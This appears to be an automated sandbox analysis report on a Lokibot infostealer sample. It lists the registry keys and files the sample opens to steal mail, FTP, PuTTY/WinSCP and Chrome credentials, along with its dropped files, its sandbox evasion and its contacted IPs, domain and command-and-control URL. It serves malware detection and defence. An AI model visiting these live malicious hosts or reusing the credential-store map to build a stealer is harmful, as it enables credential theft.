Source: C:\Users\user\Desktop\SC_TR11670000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004031D6

Stealing of Sensitive Information
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SC_TR11670000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828467 Sample: SC_TR11670000.exe Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 24 zed-unusual-activity-com.veldaeffertz.ml 2->24 30 Snort IDS alert for network traffic 2->30 32 Multi AV Scanner detection for domain / URL 2->32 34 Antivirus detection for URL or domain 2->34 36 3 other signatures 2->36 8 SC_TR11670000.exe 1 48 2->8         started        signatures3 process4 file5 18 C:\Users\user\AppData\...\Krugerite.Fri, data 8->18 dropped 20 C:\Users\user\...\AEGISIIIRadeonHelper.dll, PE32+ 8->20 dropped 22 C:\Users\user\AppData\Local\...\System.dll, PE32 8->22 dropped 38 Tries to detect Any.run 8->38 12 SC_TR11670000.exe 21 8->12         started        signatures6 process7 dnsIp8 26 171.22.30.147, 49842, 80 CMCSUS Germany 12->26 28 zed-unusual-activity-com.veldaeffertz.ml 188.114.97.3, 443, 49841 CLOUDFLARENETUS European Union 12->28 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->40 42 Tries to steal Mail credentials (via file / registry access) 12->42 44 Tries to harvest and steal ftp login credentials 12->44 46 2 other signatures 12->46 16 WerFault.exe 2 12->16         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
171.22.30.147
 unknown Germany
33657 CMCSUS true
188.114.97.3
 zed-unusual-activity-com.veldaeffertz.ml European Union
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
zed-unusual-activity-com.veldaeffertz.ml 188.114.97.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://171.22.30.147/flowe/five/fre.php true
  • Avira URL Cloud: malware
 unknown
https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sea true
  • Avira URL Cloud: safe
 unknown